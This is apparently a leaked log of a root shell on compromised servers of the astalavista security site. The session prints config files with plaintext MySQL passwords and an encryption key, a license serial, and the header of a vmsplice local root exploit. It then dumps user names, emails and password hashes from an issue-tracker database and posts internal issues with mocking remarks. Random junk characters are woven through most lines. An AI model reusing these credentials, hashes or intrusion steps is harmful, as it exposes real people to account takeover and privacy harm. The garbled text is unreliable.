drwx–x–x  3 astanet astanet 4096 Dec 23 12:18 domains" c' o$ \" b$ Y
drwxrwx—  3 astanet mail    4096 Dec 23 12:18 imap
; J! V6 c: W6 N9 |0 o( Qdrwx——  2 astanet astanet 4096 Dec 23 12:18 mail$ R' |4 S9 l) C% |$ j9 V. ]
-rw——-  1 astanet astanet  197 Jun  4 09:51 .mysql_history! |, G% g  o+ y  k& g3 w) y
lrwxrwxrwx  1 astanet astanet   37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
8 c, _3 f1 S2 c( E' {-rw-r—–  1 astanet mail      34 Dec 22 12:41 .shadow4 o8 s% f# p1 b) H/ \
5 k9 O' X* m! ^; J- A3 ~( D7 `1 _, b
sh-3.2# cd auth/
: @% n+ i# q' J# a& zsh-3.2# ls -la* U$ x! C* a: J7 d. Q# s
total 28
8 O( Q' o4 W+ w% W* R6 Z, y" H( |drwxr-xr-x 2 root    root    4096 Dec 23 16:00 .
3 u5 v6 \* a. K  m: H+ E3 M5 g" Fdrwx–x–x 6 astanet astanet 4096 Jun  4 09:51 ..
6 z) v7 _% Y1 u. u-rw-r–r– 1 root    root     321 Jan  5  2006 hackercontest.config.inc.php8 K; L' e) G! p# T- k) j
-rw-r–r– 1 root    root     319 Jan  5  2006 hosting.config.inc.php
6 n7 G4 ^6 a7 H  R* ^-rw-r–r– 1 root    root      24 Jun  4 09:38 .htadm_pwd
3 q* z3 v, Z) v3 {-rw-r–r– 1 root    root      49 Jan  5  2006 .htpasswd_newhosting5 x) X+ ]1 n/ ?
-rw-r–r– 1 root    root      51 Oct 11  2006 .htwebalizer_pwd
# H- E; b* P! F  D1 S
6 a8 Q4 g4 G+ q0 V5 ], ?2 ]/ ]sh-3.2# cat hackercontest.config.inc.php
" A. R4 a4 z' N4 l0 v5 I<?PHP
. k* G$ U- q: P0 j- j- K8 k( f: [// Variabeln f?r Verbindung zur Datenbank //  N5 {9 f5 M5 A5 ~: P) q9 r! x7 F2 O
$conxHost = ‘localhost’;                       // MySQL hostname
5 P; g. v- G" _& Y/ F' b/ [$conxUser = ‘hackercontest’;                                       // MySQL user/ c* ]& S; P& a' |* f" b0 j. j8 [
$conxPassword = ‘K6m@7dUc’;                    // MySQL password
6 G' c+ Z6 b! B+ k8 F1 U  [$bfkey = ‘cXvB3981′;                                       // Encryption/Decryption Key for Blowfish
7 Q4 ]) z; a2 ~1 {/ k5 d7 u?>) n9 o! X1 h0 `
sh-3.2# cat hosting.config.inc.php6 ?, g4 j' l2 n: y" N: u
<?PHP
/ c6 Z9 F: N; ]4 h& {8 N* H// Variabeln f?r Verbindung zur Datenbank //
: a5 \4 D6 V; D6 y1 b- \- o$conxHost = ‘localhost’;                       // MySQL hostname
" o, b" m4 g7 ^7 x7 k: D$conxUser = ‘hostinguser’;                                 // MySQL user* b  W  m  c" A, ?$ s% _
$conxPassword = ‘cXvB3981′;                    // MySQL password5 q, _/ W% A" }, T, D5 r- K
$bfkey = ‘cXvB3981′;                                       // Encryption/Decryption Key for Blowfish
% L0 |; f, Q6 a. }& M?>) J0 V* {, v9 n) B
( w  k! p, T# h: R: \0 i2 z
sh-3.2# cd ..; u) c7 n& ?# h: H# u; n/ j
sh-3.2# cd com9 S) w* \6 u, J- l8 X" E7 X5 @* }
sh-3.2# ls -la8 n% S) X4 u+ F# Q$ y, t. f
total 141208
8 ?4 ?1 m, j, adrwx–x–x 10 com  com       4096 Apr 28 12:40 .1 d" d; m' Y8 r# r
drwxr-xr-x 14 root root      4096 Mar 11 17:56 ..
9 p/ ]+ p( L7 |5 t! }! k8 K! mdrwx——  2 com  com       4096 Jun  4 04:04 backups/ U: `2 r8 i; f9 F+ h5 K( B
-rw-r–r–  1 root root   2419504 Sep 28  2007 backup.sql2 ~  D9 o% \- v# c2 V4 g
drwxr-xr-x  2 com  com       4096 May 12 15:20 backup_system/ @; b; U8 L* E) O( ]
-rw——-  1 com  com      21880 Jun  2 08:07 .bash_history
0 `4 t0 u7 w" n3 y* r& M' T- ?-rw-r–r–  1 com  com         24 Sep 24  2007 .bash_logout8 a" M9 {2 }4 W2 i$ L% }0 X' t1 ]# |
-rw-r–r–  1 com  com        176 Sep 24  2007 .bash_profile0 F3 P, O- S  @9 n* j
-rw-r–r–  1 com  com        124 Sep 24  2007 .bashrc
* c' l( b! E  L  r* E- jdrwx–x–x  3 com  com       4096 Jan 29  2008 domains1 z. j; y; V2 ^# Q; x
-rw-r–r–  1 com  com      16409 Jul 16  2008 FWUser.class.php.fixed
5 Y: o9 _6 `% G* p- b+ M. E# odrwxrwx—  3 com  mail      4096 Jan  6 19:24 imap1 T4 n( P4 x) e9 o0 o( }0 c
-rw——-  1 com  com         69 Nov 18  2008 .lesshst
& a+ k8 g0 x* @$ q6 }5 v  g  idrwx——  2 com  com       4096 Sep 24  2007 mail$ g* C5 S) p$ g4 A2 y$ _1 Y
-rw——-  1 com  com      13970 Mar 28 21:42 .mysql_history
2 j1 M. a  p9 X* ndrwxr-xr-x  2 com  com       4096 Aug 20  2008 .ncftp
- ]) a" @! O  ?' plrwxrwxrwx  1 com  com         37 Sep 24  2007 public_html -> ./domains/astalavista.com/public_html$ l! b2 K5 h) g" T0 e+ n
-rw-r—–  1 com  mail        34 Sep 24  2007 .shadow
6 _: I+ h  m- e, Kdrwx——  2 com  com       4096 Aug 26  2008 .ssh
8 m% u+ F, O) e-rwx——  1 com  com       8515 Feb 10  2008 t
1 ?, ?5 }5 k: h/ S( E-rw-rw-r–  1 com  com       6265 Feb 11  2008 t.c
( z. [  ^6 J9 i& Sdrwxrwxr-x  2 com  com       4096 Jan 30 15:47 tmp1 c5 c- L7 V2 N8 z% O! K
-rw-rw-r–  1 com  com        617 May 20  2008 .toprc' S) ]0 B/ o  L  u% D+ M
-rw-rw-r–  1 com  com  141851766 May 19  2008 version2-backup-20080519-0900.sql/ l8 f& r1 E. f5 u& R! Y. X! d
-rw——-  1 com  com      16629 Mar 28 21:46 .viminfo
1 S+ y2 B) x8 X7 J. h# M-rw-rw-r–  1 com  com         51 Aug 25  2008 .vimrc
5 Y  O) z) U4 ?0 ]- ]" S+ f
$ J: }' I% u: J& Vsh-3.2# head t.c
4 J* i$ ^# x' ?! j6 _% O/*
$ |  B& j" t8 B* c6 f9 L; m! r4 E7 P( _* jessica_biel_naked_in_my_bed.c' a; g$ }; p3 x9 J
*; Q" G% Z' z2 P# @: O
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
6 u* K( c% ]9 [9 P* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
9 U1 A% z! s- Z9 ~* Stejnak je to stare jak cyp a aj jakesyk rozbite.. W/ E& W" K/ N  j* N8 R
*
$ d; k: m, U7 q8 |, f* Linux vmsplice Local Root Exploit
3 p  W- M! C8 N7 L3 N' S& r* By qaaz+ ~' G# N, `- Z/ S1 Z2 B
*
. K5 v6 |8 m3 q% R" x9 n7 I; t2 ]' W8 j0 I/ A5 T, }
sh-3.2# cd /% l( |- ^2 @% w& B2 }! O
sh-3.2# ls -la
" ]4 i& w& `( `2 }total 360+ m0 H4 O) a/ C! y8 F
drwxr-xr-x  25 root root   4096 Jun  3 02:43 .6 j) a6 ^! A' j) T; D
drwxr-xr-x  25 root root   4096 Jun  3 02:43 ..
  ^( ~5 C% D: [( a7 f" z-rw——-   1 root root  10240 Jun  3 02:39 aquota.group' o- T7 G) Q+ ?/ R- M+ N: P
-rw——-   1 root root  10240 Jun  3 02:39 aquota.user/ }5 [% k2 `, U' t! s( X
-rw-r—–   1 root root    819 Jul 17  2008 astalavista.us.db0 m8 F' [/ i. z7 G* p  r- }
-rw-r–r–   1 root root      0 Jun  3 02:43 .autofsck" h3 v. R7 N2 e6 V% H
-rw-r–r–   1 root root      0 Sep 16  2007 .autorelabel
& M: _' w8 ^* k# Gdrwxr-xr-x   3 root root   4096 Dec 29  2007 backup
( H: n  N+ [) h# ldrwxr-xr-x   2 root root   4096 Jun  4 04:03 bin& T, @) f" Z4 j5 s( C2 E& m. u4 B
drwxr-xr-x   5 root root   4096 Jun  2 14:06 boot
- v* y5 j7 A! V; `drwxr-xr-x  11 root root   3620 Jun  3 02:43 dev
0 D' H* L" D* j  x5 zdrwxr-xr-x  84 root root  12288 Jun  4 03:16 etc
1 I; R$ |% y$ P% A4 ?& y/ kdrwxr-xr-x  14 root root   4096 Mar 11 17:56 home
+ ]* r2 t! g$ D9 V3 c-rw-r–r–   1 root root  13387 Mar 20  2008 httpd.conf9 C! s4 S4 X3 E6 t. x+ B
drwxr-xr-x  11 root root   4096 Jun  4 04:02 lib
- K! G$ r% T0 F+ t1 i( L" E: Jdrwxr-xr-x   7 root root   4096 Jun  4 04:03 lib64# Y1 R2 t& o5 `) B
drwx——   2 root root  16384 Sep 11  2007 lost+found
( J/ W" h  x. Xdrwxr-xr-x   2 root root   4096 Mar 11 17:56 media
9 c% Z& P' \1 P# w, {drwxr-xr-x   2 root root      0 Jun  3 02:43 misc
3 q8 u, R3 o4 I* D& Y1 fdrwxr-xr-x   2 root root   4096 Mar 11 17:56 mnt
8 d2 y4 }# Q2 t( y1 r7 v# u. C9 `-rw-r–r–   1 root root   5859 Feb  3  2008 mrtg.cfg' O9 B' b# F6 ]3 I
drwxr-xr-x   2 root root      0 Jun  3 02:43 net# r+ J8 m- a/ G2 k1 y- h. e  T
drwxr-xr-x   3 root root   4096 Mar 11 17:56 opt" b, N) C. [7 N  |9 I
dr-xr-xr-x 264 root root      0 Jun  3 02:42 proc
1 v2 z/ |; j9 p: p# s3 M: Rdrwxr-x—  15 root root   4096 Jun  4 08:40 root  P7 o+ q% o: b: j6 }+ a9 J
drwxr-xr-x   2 root root  12288 Jun  4 04:03 sbin6 V2 J- C, u( `( a( u( G
drwxr-xr-x   2 root root   4096 Mar 11 17:56 selinux
& y' Y9 f: r( W* i8 ldrwxr-xr-x   2 root root   4096 Mar 11 17:56 srv; d2 ^/ U+ w* {" p/ \( R
drwxr-xr-x  11 root root      0 Jun  3 02:42 sys
3 g' k. c4 f- J" b9 Jdrwxrwxrwt   4 root root 122880 Jun  4 10:35 tmp
0 B0 J+ _, u; }) {drwxr-xr-x  16 root root   4096 Jun  2 13:56 usr% e) }: W6 e  k
drwxr-xr-x  26 root root   4096 Jun  4 03:16 var& t3 K- h7 U, i8 o7 S! C2 Y& [& v
8 z. J+ G" t+ r
sh-3.2# cd opt# ?% }3 a  F' S3 e
sh-3.2# ls -la& d/ T0 m1 f' U7 V; G9 a$ E
total 20
% j/ z7 H/ Y8 P( ^- I* a2 ^drwxr-xr-x  3 root root 4096 Mar 11 17:56 .# ]$ O; {: }/ L2 w2 v$ o
drwxr-xr-x 25 root root 4096 Jun  3 02:43 ..$ S% `2 s$ o$ K5 a
drwxr-xr-x 15 root root 4096 Mar 20  2008 lsws
4 }. {( ]6 r& X
" d2 I' f2 R6 [sh-3.2# cd lsws/
4 d- V- l: a: G3 jsh-3.2# ls -la9 N& I6 `* Z; ^2 A/ _
total 108
2 }" S. _! z. B* `; B; vdrwxr-xr-x 15 root   root    4096 Mar 20  2008 .4 L! o+ U/ ~% m6 \: r- X
drwxr-xr-x  3 root   root    4096 Mar 11 17:56 ..
2 A* u- S& u1 j2 \7 p7 u7 G9 Kdrwxr-xr-x  8 root   root    4096 Mar 20  2008 add-ons( ^, c8 A8 }, E0 X) {
drwxr-xr-x 13 root   root    4096 May 29 15:10 admin/ C; H  u% F( I$ O1 w  h: y7 V
drwxr-xr-x  5 apache apache  4096 May 29 15:10 autoupdate
) i3 T" w" v5 k" idrwxr-xr-x  2 root   root    4096 May 29 15:10 bin
0 x: I* `7 O) Udrwx——  4 apache apache  4096 Jun  3 02:43 conf
3 V4 b: c! Y' A/ I) gdrwxr-xr-x  7 apache apache  4096 Mar 20  2008 DEFAULT. f2 [- ?5 t: ^* U) ~  a( e
drwxr-xr-x  2 root   root    4096 Sep 15  2008 docs6 q, j& ?: [) K* A5 g
drwxr-xr-x  2 root   root    4096 May 29 15:10 fcgi-bin
0 g' G* E5 s4 P6 }+ k( Tdrwxr-xr-x  2 root   root    4096 Sep 15  2008 lib, f5 j. S* P9 @, Y$ V
-rw-r–r–  1 root   root    6959 May 29 15:10 LICENSE
. G: o; e' V! _1 \0 {  u-rw-r–r–  1 root   root    2214 May 29 15:10 LICENSE.OpenLDAP3 I- _2 R& g; Z+ r
-rw-r–r–  1 root   root    6279 May 29 15:10 LICENSE.OpenSSL: r3 R2 f+ o7 d
-rw-r–r–  1 root   root    3208 May 29 15:10 LICENSE.PHP7 H+ _; u/ G' r
drwxr-xr-x  2 root   root   20480 Jun  4 09:55 logs0 D/ R6 g2 q; D: V+ O
drwxr-xr-x  2 root   root    4096 Mar 20  2008 php' F; z8 H& m4 G
drwx——  2 apache apache  4096 Mar 20  2008 phpbuild
& J* o- t+ [: |/ H2 h! idrwxr-xr-x  3 root   root    4096 Mar 20  2008 share, v) m2 ^- k6 `1 V/ C* ~$ h
-rw-r–r–  1 root   root       6 May 29 15:10 VERSION
; ?, ~" F; R* [. z  D. W4 b6 a' K0 ~$ c& |% t2 b' O
sh-3.2# cd conf0 c$ s  c( H" C8 r8 A" z% T$ c
sh-3.2# ls -la
% w7 B- W, w9 m% L% W5 Ototal 48
  T3 K+ K  E& `$ s0 V' j! I% cdrwx——  4 apache apache 4096 Jun  3 02:43 .
% n/ U7 a7 R. O( Tdrwxr-xr-x 15 root   root   4096 Mar 20  2008 ..+ q4 ?  E# x6 z0 n( q1 {: }
drwx——  2 apache apache 4096 Mar 20  2008 cert* h+ a7 i9 L4 O8 [* h
-rw-r–r–  1 apache apache 6668 May 29 15:13 httpd_config.xml
5 ^9 Y5 i# E( N  E4 N4 Y& }-rw——-  1 apache apache 6613 May 27 18:33 httpd_config.xml.bak+ J0 X, y5 t/ I' a! {" ^- @
-rw-r–r–  1 root   apache    0 Jun  3 14:11 .last- U( Q$ s, n; ?( V
-rw——-  1 apache apache  256 May 29 15:10 license.key" e, i# r+ U- S) `; \/ v
-rw——-  1 apache apache  256 Mar 21  2008 license.key.old4 [" W" |5 y& n. R
-rw——-  1 apache apache 3320 Mar 20  2008 mime.properties+ T' }- R5 X* k5 j# j2 d
-rw——-  1 apache apache   20 May 29 15:10 serial.no: F  J3 l7 q5 D
drwx——  2 apache apache 4096 Mar 20  2008 templates, u5 j: e* d; q/ n/ ?

5 j" T  d4 U& @1 nsh-3.2# cat serial.no5 B# R% t7 {1 L0 d
IbDl-oVsO-CKqL-wVRa
" N( B- ^' \) `- N9 N2 o: K2 i$ @4 h+ n  C
sh-3.2# mysql* ]* n3 E% e$ {- Q
Welcome to the MySQL monitor.  Commands end with ; or \g.# b6 w5 D. B& j) m! u
Your MySQL connection id is 2868441 y% l* c& a, |1 r. F4 v
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
- S7 J8 c8 a, y
9 l, M. N; A" M, B1 y2 ~Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer./ p. m; c2 P( V, |
$ V, `# s' T4 i' s' p8 c9 [9 E
mysql> show databases;  |9 Y: O8 d3 L  u$ q* e/ Z
+———————–+/ l* ^- P) L, f6 q9 f* j  l
| Database              |
* Z) P8 l9 U4 n! d- ]+———————–+
0 C0 d, ^$ G$ J6 b$ @5 ~| information_schema    |
% k9 \: j0 _9 R" R| astanet_ads           |1 n. I. [  _  G  p# X" W
| astanet_mailing_lists |( h' B: q& [2 _' a0 G
| astanet_mediawiki     |
9 C* T/ ~% f+ R0 x5 O| astanet_membersystem  |- Q6 g: m0 x9 n# F* `  O* u
| com_contrexx          |
' o1 ?: f% \$ T! v| com_contrexx2         |
- g" \5 O& y: S| com_contrexx2_live    |
3 s. P; \9 g; u8 U% w4 A| da_roundcube          |
5 q& z0 I1 I0 E3 H( h9 a| dolphin               |
, o5 j+ Q9 s' t; R! w$ K| ideapool              |
% }8 w% T6 p" K# H  Q/ D| mysql                 |
+ t, l0 j' a* H: O' W- g- ^5 \2 Y| test                  |) ]: Y; I$ e4 ?6 e; R3 h
| yourmaster            |
4 p* I6 c& y; F" o: \$ f2 U# V+———————–+
: ?, s7 z) u* r1 O( f3 {2 R14 rows in set (0.00 sec)
( D1 X- ]$ ?0 e) N: X# R
5 b6 O. ^7 V1 D: I$ V3 D6 q. \2 F' umysql> use ideapool
1 H. q7 m" `5 yDatabase changed$ N" ~" u$ w: d
mysql> show tables;
8 H+ V9 l* h( E) G9 Z) H+———————————–+- Z& b( K& U9 F+ w' G/ n2 l
| Tables_in_ideapool                |
  f- |7 c- T' x1 P: t9 Z9 X+———————————–+8 ^3 P; i4 u. V1 F% x* A0 ~( ?
| eventum_columns_to_display        |3 Q" Z2 p% K/ p6 b6 b. @
| eventum_custom_field              |8 C$ [6 t" }- i1 `
| eventum_custom_field_option       |
( q" g! B1 p' h3 _# T  y8 p1 m| eventum_custom_filter             |
8 F1 ^( e. [$ A! z9 A1 E" [5 e| eventum_customer_account_manager  |
* k/ D5 h; T, ~% B4 I1 }| eventum_customer_note             |
. k# h+ s0 k3 A1 i& q| eventum_email_account             |
$ X& `% O9 B) v- b| eventum_email_draft               |
$ s% o/ X8 m& ?/ U+ x| eventum_email_draft_recipient     |
, c8 C1 `: E! {/ q+ \| eventum_email_response            |
4 J; W  t" D7 v" G, G- d9 \! j| eventum_faq                       |
. u& @- N6 [5 M0 H$ [| eventum_faq_support_level         |" \: D3 r" g3 ]0 @8 s
| eventum_group                     |7 a. Z+ `5 y6 O% w, c# `$ P) U
| eventum_history_type              |
0 p3 Z: a2 a* u& }4 W3 ~8 F8 g| eventum_irc_notice                |3 K& b! I5 F& k' m
| eventum_issue                     |
. ^; f- Q. [6 _$ v+ I% v! X" _4 d| eventum_issue_association         |, p% T$ O7 h% y1 X$ D
| eventum_issue_attachment          |3 Z9 U( ^! p. ]3 R# U+ |& b
| eventum_issue_attachment_file     |" l' w. x) [) S+ l- F
| eventum_issue_checkin             |( W; ?. x+ y8 ^5 W- h, h; O
| eventum_issue_custom_field        |" g* ^6 t! ~8 {0 l' t$ J
| eventum_issue_history             |/ ]2 Q/ e* {* U! y9 h. g* s. Q
| eventum_issue_quarantine          |' n0 T! E  |0 |. x; ]8 a
| eventum_issue_requirement         |
- z3 `+ a2 h# ]- B* |. X| eventum_issue_user                |% B# p* b' E: v/ A+ R: p, J5 B* }$ F
| eventum_issue_user_replier        |1 _0 p; ^' p7 O5 B/ _
| eventum_link_filter               |& S2 `; X. d" Y2 [) o/ V
| eventum_mail_queue                |. @  d9 N1 A+ n) T) s3 D4 _
| eventum_mail_queue_log            |
0 R  X6 m  b/ V" p. h4 f  o| eventum_news                      |
7 M) `: y/ }" E% g5 {: M" Z| eventum_note                      |# E8 S+ Z; R! u( w4 s. ?" m
| eventum_phone_support             |
0 H% t4 o! r  I$ G* m' ^# p# ^| eventum_project                   |
0 X7 d6 Z4 Y0 }( d7 D# B| eventum_project_category          |
" h. @/ F6 A5 {+ J7 n" B0 a2 o| eventum_project_custom_field      |/ ]3 ~" |, h0 G& s
| eventum_project_email_response    |
0 }: [. O4 k9 [" d! s/ E7 b) i, R3 j| eventum_project_field_display     |/ i; q  J' I  r( C+ p/ |# M# [
| eventum_project_group             |, P- q- l. |% d- f) t9 i
| eventum_project_link_filter       |. i* S: y* n( G4 _+ u: }( W
| eventum_project_news              |& O7 x+ e% u0 f. l7 C5 _/ l
| eventum_project_phone_category    |
/ O# z" ^5 y! [& I  E4 p1 T% z7 B| eventum_project_priority          |
$ P5 C* k- F" n! t3 Y- C| eventum_project_release           |
- @; f/ B2 h9 ^5 M7 s# @| eventum_project_round_robin       |
5 L) T0 O7 C- L# w| eventum_project_status            |
% n6 ?8 m* S5 k0 I/ }+ V| eventum_project_status_date       |
6 I5 y( a% Q) t$ x( S| eventum_project_user              |3 j) `7 L' ]' q. R' Y* C
| eventum_reminder_action           |/ l( U2 s% l: f
| eventum_reminder_action_list      |
7 V; u6 X7 c; N' ]| eventum_reminder_action_type      |
7 _* _$ W4 _! b, ~% t% `0 Q' t/ t| eventum_reminder_field            |
* u- X8 C9 A; T| eventum_reminder_history          |
  I! a" x& ^& t| eventum_reminder_level            |
( C7 v/ A$ X- w. q: h  A) M7 t| eventum_reminder_level_condition  |0 m7 x2 x* V! r
| eventum_reminder_operator         |5 ~( V- ?2 S* V) h- r
| eventum_reminder_priority         |
# C" l& Q) m; p+ _| eventum_reminder_requirement      |
# Z* G. N5 N; O( S6 d+ d| eventum_reminder_triggered_action |4 q: O# l+ A% l( P' _2 e
| eventum_resolution                |
% {! @8 b- Z: O' D6 S' e% f( [| eventum_round_robin_user          |) B' M: l! w6 {" H. ]
| eventum_search_profile            |
# |) f; K4 _1 F1 V( j| eventum_status                    |
& X7 O% t- m' U/ J- [| eventum_subscription              |" B, s  W8 U3 F4 l  s. E
| eventum_subscription_type         |( m1 Y$ `1 T* m6 E" Q
| eventum_support_email             |
3 D, x7 o1 @0 H  X# \' \$ `+ i6 r* G1 L| eventum_support_email_body        |5 n5 W+ d- h. ^) o+ u: q
| eventum_time_tracking             |
7 {" Y0 N7 {* v5 d+ F| eventum_time_tracking_category    |
4 h% Z7 g- y2 \- {& d| eventum_user                      |
/ K& o) z( G, S+ D: |% c$ W+———————————–+
* P9 g+ R! n* C; B69 rows in set (0.00 sec)
; H1 C2 Z) `, O& o. ~, {& K* w$ l- E
& ?* \% h  t0 |- t5 h/ @& T& ?mysql> describe eventum_user;6 N) y; W! M* K0 |! {9 H
+————————-+——————+——+—–+———————+—————-+
5 z6 C( ]* V. \| Field                   | Type             | Null | Key | Default             | Extra          |$ W& r& h" [: B
+————————-+——————+——+—–+———————+—————-+
4 K9 r! ^. w7 R| usr_id                  | int(11) unsigned | NO   | PRI | NULL                | auto_increment |
9 @2 [% V5 E( }/ j0 `* l| usr_grp_id              | int(11) unsigned | YES  | MUL | NULL                |                |- B* m" L  M, p# b$ X
| usr_customer_id         | int(11) unsigned | YES  |     | NULL                |                |
+ t2 s; u( R2 q& L2 L- l  W| usr_customer_contact_id | int(11) unsigned | YES  |     | NULL                |                |- I! [- y2 e+ l8 D( r0 {- ^
| usr_created_date        | datetime         | NO   |     | 0000-00-00 00:00:00 |                |
8 C7 z# i8 l  b# a7 A" o; L8 O" g- c| usr_status              | varchar(8)       | NO   |     | active              |                |/ c" y3 f- S7 T& i5 r
| usr_password            | varchar(32)      | NO   |     |                     |                |
0 \5 z9 Q: g+ u7 P: k| usr_full_name           | varchar(255)     | NO   |     |                     |                |" R5 v5 j" C! Y& G" e! h" s# I/ {  g
| usr_email               | varchar(255)     | NO   | UNI |                     |                |
4 T% V: m/ [5 R: w| usr_preferences         | longtext         | YES  |     | NULL                |                |
. ?4 r+ C$ z1 {: ~$ l| usr_sms_email           | varchar(255)     | YES  |     | NULL                |                |
$ e$ Y' o! v* J8 ]% u| usr_clocked_in          | tinyint(1)       | YES  |     | 0                   |                |1 x+ y- C5 v+ r  |. p
| usr_lang                | varchar(5)       | YES  |     | NULL                |                |
2 t4 n& M' m' F+ o4 ^+————————-+——————+——+—–+———————+—————-+' S  ^7 {& T$ k8 T% F
13 rows in set (0.00 sec)
9 w" E& z  ~* \' ^0 o& D5 u: O
! T; \" s1 e# z# X" C: K* L- `mysql> select usr_full_name,usr_email,usr_password from eventum_user;0 H" k( U  t! i9 ^1 g! o
+———————-+——————————-+———————————-+
$ W8 g+ R# |, Z  T# P/ ~9 H| usr_full_name        | usr_email                     | usr_password                     |
8 {0 [! ~, V' a  M+———————-+——————————-+———————————-+* I& K! ~! Q; x
| system               | 链接标记system-account@example.com    | 14589714398751513457adf349173434 |8 t3 y9 ]3 q! Y
| Developer (Paulo)    | 链接标记paulo.santos@astalavista.ch   | 26a35a1cf8895c27fb37ef4cf149f7bb |
9 U; i7 V* r# x4 Z7 || Be1er0ph0r           | 链接标记be1er0ph0r@gmx.de             | 229766dc0ca1fb67160a8782321dfdce |/ j. H; v: L! L; K; M
| Admin                | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |! U& C/ C( ]  t; `% e# l  }
| ADMIN                | 链接标记admin@astalavista.ch          | f6fdffe48c908deb0f4c3bd36c032e72 |
+ R+ l1 P3 P6 p; b. ]9 Z| USER                 | 链接标记user@astalavista.ch           | 5cc32e366c87c4cb49e4309b75f57d64 |7 c2 f6 z; d4 N; W, F
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com       | f7735ab119023a8abb2301e67f81cd67 |% Z- s! i/ T+ W
| Joao                 | 链接标记joao.pontes@astalavista.net   | f805c071d7c823b937448c54c047b9fd |
! D' Y# j5 q6 h# X* L" K| Pascal               | 链接标记pm@astalavista.ch             | e10adc3949ba59abbe56e057f20f883e |
7 T+ t7 W& Y4 p2 W3 }1 n  w% H: T| commander            | 链接标记commander@astalavista.com     | 932cd250918f881d41feb0b93883a926 |
, A5 Z! q! U" I6 S| ishtus               | 链接标记ishtus@astalavista.com        | a587ffc88b3dbbba3fd2fe67af649ff0 |
+ X3 }  W8 x* B  || sykadul              | 链接标记sykadul@astalavista.com       | 20224a2f3eeb57a13a10b4df543c128e |4 a) i; {: I. d$ z; R1 h* ^
| Zach McElroy         | 链接标记admin@badfoo.net              | 33c5d4954da881814420f3ba39772644 |/ l$ s* M; ~1 b
| usb                  | 链接标记usbenigma@hushmail.com        | b513f22c3db6932855ad732f5f8a10a2 |
8 X; D& g# t1 a4 g2 E' I! v! g| cyph3r               | 链接标记cyph3r@astalavista.com        | 6e1e50017a945e874d52ec91f9ab2cee |8 x1 G9 Z# c! \. f
+———————-+——————————-+———————————-++ v7 Y! H& Z: P2 o
15 rows in set (0.00 sec)7 R& N  p' f: S
9 x& d0 u- T% T% j% O; P: a3 Z
mysql> select iss_description from eventum_issue where iss_id = 43;3 ?: ?' p0 z: T' }  F
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
) m; j2 E4 [: O% _! I| iss_description                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
# M4 G. k" w& Y& ?- H& d6 b|
6 x3 U/ y, _1 g  n/ [' D% o1 R+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
' Z  s4 t% R# ]# K| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be7 d. A4 A! p6 D% x3 O0 e! h
connected for 90 mins… 120mins… so what i propose is something like:/ A( r0 @! U7 E2 ~- O' k: p  h, B
链接标记[url]http://www.surfthechannel.com/[/url]
5 F! n! D. l( ~since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
; n+ F; K( t- C9 u- y7 W3 b1 Z3 S4 Klike podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
& ~: y1 {/ V# u) q) e) _break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
8 L  Y# I" g+ U: e5 b, x' qif they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
8 [1 V; Y% a4 p' i" u9 A* V; f0 T7 O( _$ v. g
We could also put advertisement during play on the flash video player itself… extra $$…* T( I) J  r! V! p

$ L: P' h, @2 o* v: M. XBy sykadul |
9 a  U" ^5 \6 N3 Q4 |8 N+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
0 S9 H, `* R0 n8 J. s& K1 U1 row in set (0.00 sec)
2 |* J2 l1 o+ ?' E! M3 L4 z4 y4 m: D! H, l2 d7 |
// Money and extra $$ is all they care about. remember that.! o6 L5 g+ t% Y. y% {& u# @7 f$ j! R

/ N0 N/ S2 h) M5 Tmysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
" @1 Y( D, T3 S+————————+——————————————————————————————————————————————————————————————————————————————-+- J7 G8 t# X- f9 w; r
| iss_summary            | iss_description                                                                                                                                                                                                                          4 M7 \+ \- `" m8 m
|
# M1 Q5 R5 _9 L8 Y+————————+——————————————————————————————————————————————————————————————————————————————-+
. f! b' Q1 G% ^1 q8 z8 P; [7 F| Forum for REAL EXPERTS | Hello,
$ @/ I- k! i- [' Z6 @2 i3 k% K8 ]
2 {+ K7 X& G4 A9 I, r9 {% x, LIshtus and I,
8 w2 K- Q9 i) r; O) b/ ^( K6 z/ p1 D& U- B! [! Y7 j& j3 |
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide, X( H- K) W8 G' I9 [2 _
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..3 `4 w  p1 e- e( |% e) p
" a' j; C* }/ Z' w7 t
One example a friend of mine from coresecurity.com!: |/ T. H7 l$ z9 J# }
. O& f- X6 R' f
We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..
% l3 Q( K9 C1 W2 _5 [* M
0 n/ J2 ]' X. R3 x|9 h6 j0 b* r- a( p# N
+————————+——————————————————————————————————————————————————————————————————————————————+* e8 u0 Q6 s. P3 c  \% \
1 row in set (0.00 sec)2 \6 s- p8 F6 z6 _8 t+ M: E
( n# a9 F$ s9 Y7 {7 y9 r
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…  j3 _* ?1 N' U+ S

2 Z, u$ `' c1 t6 `; q) v5 tmysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
, a) u' L/ o& D; a( \' \+——————+———————————————————————————————+
+ J" ~) B& R( @8 h0 H3 t| iss_summary      | iss_description                                                                             |" s1 U) }% P; b8 V) {: k$ G* G0 M
+——————+———————————————————————————————+
